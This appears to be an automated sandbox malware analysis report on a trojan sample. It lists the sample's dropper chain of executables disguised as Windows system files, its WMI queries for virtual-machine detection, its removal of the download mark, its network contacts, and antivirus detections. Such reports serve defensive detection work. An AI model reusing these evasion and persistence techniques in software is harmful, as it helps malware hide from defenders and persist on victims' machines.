                                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Window found: window name: SysTabControl32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: sJ9Q8UWMAX.exeStatic file information: File size 3987229 > 1048576
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-64\privacy_feature\privacy_feature.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: sj9q8uwmax.exe , 00000001.00000002.745852702.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-32\win_dwm\win_dwm.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-64\win_dwm\win_dwm.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-32\privacy_feature\privacy_feature.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb@ source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdbR source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp

                                Data Obfuscation

                                barindex
                                Detected CryptOne packer
                                Source: C:\Windows\Resources\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
                                Detected unpacking (changes PE section rights)
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Unpacked PE file: 1.2.sj9q8uwmax.exe .3d0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Unpacked PE file: 3.2.sj9q8uwmax.exe .3d0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Unpacked PE file: 6.2.sj9q8uwmax.exe .3d0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: explorer.exe.2.drStatic PE information: real checksum: 0x4bf451a should be: 0x23da0
                                Source: sJ9Q8UWMAX.exeStatic PE information: real checksum: 0x4bf451a should be: 0x3d43a6
                                Source: icsys.icn.exe.0.drStatic PE information: real checksum: 0x4bf451a should be: 0x29178
                                Source: spoolsv.exe.5.drStatic PE information: real checksum: 0x4bf451a should be: 0x2ad27
                                Source: svchost.exe.8.drStatic PE information: real checksum: 0x4bf451a should be: 0x2902a

                                Persistence and Installation Behavior

                                barindex
                                Drops executables to the windows directory (C:\Windows) and starts them
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeExecutable created and started: c:\windows\resources\themes\explorer.exeJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeExecutable created and started: c:\windows\resources\svchost.exeJump to behavior
                                Source: C:\Windows\Resources\svchost.exeExecutable created and started: c:\windows\resources\spoolsv.exeJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeExecutable created and started: C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                Drops PE files with benign system names
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                                Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                                Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Users\user\Desktop\sj9q8uwmax.exe Jump to dropped file
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                                Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                                Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Users\user\Desktop\sj9q8uwmax.exe Jump to dropped file
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to dropped file
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                                Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                                Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to dropped file
                                Source: C:\Windows\Resources\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Hides that the sample has been downloaded from the Internet (zone.identifier)
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe File opened: c:\users\user\desktop\sj9q8uwmax.exe :Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries memory information (via WMI often done to detect virtual machines)
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
                                Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT MACAddress FROM Win32_NetworkAdapter WHERE PhysicalAdapter = TRUE
                                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 6996Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 7004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 6996Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 7020Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exe TID: 7060Thread sleep count: 417 > 30Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 5604Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 4364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 5176Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 5740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 5604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Resources\svchost.exe TID: 5868Thread sleep count: 106 > 30Jump to behavior
                                Source: C:\Windows\System32\svchost.exe TID: 4404Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeWindow / User API: threadDelayed 940Jump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 417Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeAPI coverage: 8.7 %
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeCode function: 0_2_00403A5C sgdt fword ptr [eax]0_2_00403A5C
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477Jump to behavior
                                Source: svchost.exe, 0000000A.00000002.715359302.0000018397E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                                Source: sj9q8uwmax.exe , 00000003.00000003.500025355.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000003.00000003.503811175.00000000038A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Memory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\Resources\Themes\explorer.exeDomain query: codecmd02.googlecode.com
                                Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 142.250.102.82 80Jump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeDomain query: codecmd01.googlecode.com
                                Source: C:\Windows\Resources\Themes\explorer.exeDomain query: codecmd03.googlecode.com
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Queries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Queries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Queries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Queries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: sj9q8uwmax.exe , 00000001.00000002.744571226.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: "release/win_7.0.x"
                                Source: sj9q8uwmax.exe , 00000001.00000002.745852702.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: .itext.text.custom"8ffad92693024ca1759b2f87913ca4d0""release/win_7.0.x""48815da1984dde46a0967eee042ece2e6a89546b"
                                Source: sj9q8uwmax.exe , 00000001.00000002.744571226.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: "48815da1984dde46a0967eee042ece2e6a89546b""release/win_7.0.x""8ffad92693024ca1759b2f87913ca4d0"

                                Mitre Att&ck Matrix

                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                Valid Accounts511
                                Windows Management Instrumentation                                		1
                                Windows Service                                		1
                                Windows Service                                		231
                                Masquerading                                		1
                                Input Capture                                		1
                                Query Registry                                		Remote Services1
                                Input Capture                                		Exfiltration Over Other Network Medium12
                                Encrypted Channel                                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                                Default AccountsScheduled Task/Job1
                                DLL Side-Loading                                		11
                                Process Injection                                		1
                                Disable or Modify Tools                                		LSASS Memory421
                                Security Software Discovery                                		Remote Desktop Protocol1
                                Archive Collected Data                                		Exfiltration Over Bluetooth1
                                Non-Standard Port                                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain AccountsAt (Linux)Logon Script (Windows)1
                                DLL Side-Loading                                		351
                                Virtualization/Sandbox Evasion                                		Security Account Manager351
                                Virtualization/Sandbox Evasion                                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                                Ingress Tool Transfer                                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                                Process Injection                                		NTDS2
                                Process Discovery                                		Distributed Component Object ModelInput CaptureScheduled Transfer3
                                Non-Application Layer Protocol                                		SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                                Hidden Files and Directories                                		LSA Secrets1
                                Application Window Discovery                                		SSHKeyloggingData Transfer Size Limits14
                                Application Layer Protocol                                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.commonRc.common2
                                Software Packing                                		Cached Domain Credentials1
                                Remote System Discovery                                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                                DLL Side-Loading                                		DCSync1
                                File and Directory Discovery                                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                                File Deletion                                		Proc Filesystem233
                                System Information Discovery                                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 666578 Sample: sJ9Q8UWMAX.com_7fdb00c80f02... Startdate: 16/07/2022 Architecture: WINDOWS Score: 100 72 Antivirus / Scanner detection for submitted sample 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 Detected unpacking (changes PE section rights) 2->76 78 8 other signatures 2->78 10 sJ9Q8UWMAX.exe 1 3 2->10         started        14 svchost.exe 9 1 2->14         started        17 svchost.exe 2->17         started        19 3 other processes 2->19 process3 dnsIp4 50 C:\Users\user\Desktop\sj9q8uwmax.exe, PE32 10->50 dropped 52 C:\Windows\Resources\Themes\icsys.icn.exe, MS-DOS 10->52 dropped 106 Drops executables to the windows directory (C:\Windows) and starts them 10->106 21 icsys.icn.exe 2 10->21         started        26 sj9q8uwmax.exe 18 10->26         started        70 127.0.0.1 unknown unknown 14->70 file5 signatures6 process7 dnsIp8 56 192.168.2.1 unknown unknown 21->56 48 C:\Windows\Resources\Themes\explorer.exe, MS-DOS 21->48 dropped 88 Antivirus detection for dropped file 21->88 90 Machine Learning detection for dropped file 21->90 92 Drops executables to the windows directory (C:\Windows) and starts them 21->92 94 Drops PE files with benign system names 21->94 28 explorer.exe 14 21->28         started        96 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->96 33 sj9q8uwmax.exe 1 1 26->33         started        35 sj9q8uwmax.exe 6 26->35         started        file9 signatures10 process11 dnsIp12 58 codecmd03.googlecode.com 28->58 60 codecmd02.googlecode.com 28->60 66 2 other IPs or domains 28->66 54 C:\Windows\Resources\spoolsv.exe, MS-DOS 28->54 dropped 108 Antivirus detection for dropped file 28->108 110 System process connects to network (likely due to code injection or exploit) 28->110 112 Machine Learning detection for dropped file 28->112 114 Drops PE files with benign system names 28->114 37 spoolsv.exe 2 28->37         started        62 49.12.130.236, 443, 49769, 49807 HETZNER-ASDE Germany 33->62 64 49.12.130.237, 443, 49889 HETZNER-ASDE Germany 33->64 68 2 other IPs or domains 33->68 file13 signatures14 process15 file16 46 C:\Windows\Resources\svchost.exe, MS-DOS 37->46 dropped 80 Antivirus detection for dropped file 37->80 82 Machine Learning detection for dropped file 37->82 84 Drops executables to the windows directory (C:\Windows) and starts them 37->84 86 Drops PE files with benign system names 37->86 41 svchost.exe 2 2 37->41         started        signatures17 process18 signatures19 98 Antivirus detection for dropped file 41->98 100 Detected CryptOne packer 41->100 102 Machine Learning detection for dropped file 41->102 104 Drops executables to the windows directory (C:\Windows) and starts them 41->104 44 spoolsv.exe 1 41->44         started        process20

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                sJ9Q8UWMAX.exe87%VirustotalBrowse
                                sJ9Q8UWMAX.exe86%MetadefenderBrowse
                                sJ9Q8UWMAX.exe100%ReversingLabsWin32.Trojan.Golsys
                                sJ9Q8UWMAX.exe100%AviraTR/Patched.Ren.Gen
                                sJ9Q8UWMAX.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Windows\Resources\Themes\icsys.icn.exe100%AviraTR/Patched.Ren.Gen
                                C:\Windows\Resources\spoolsv.exe100%AviraTR/Patched.Ren.Gen
                                C:\Windows\Resources\svchost.exe100%AviraTR/Patched.Ren.Gen
                                C:\Windows\Resources\Themes\explorer.exe100%AviraTR/Patched.Ren.Gen
                                C:\Windows\Resources\Themes\icsys.icn.exe100%Joe Sandbox ML
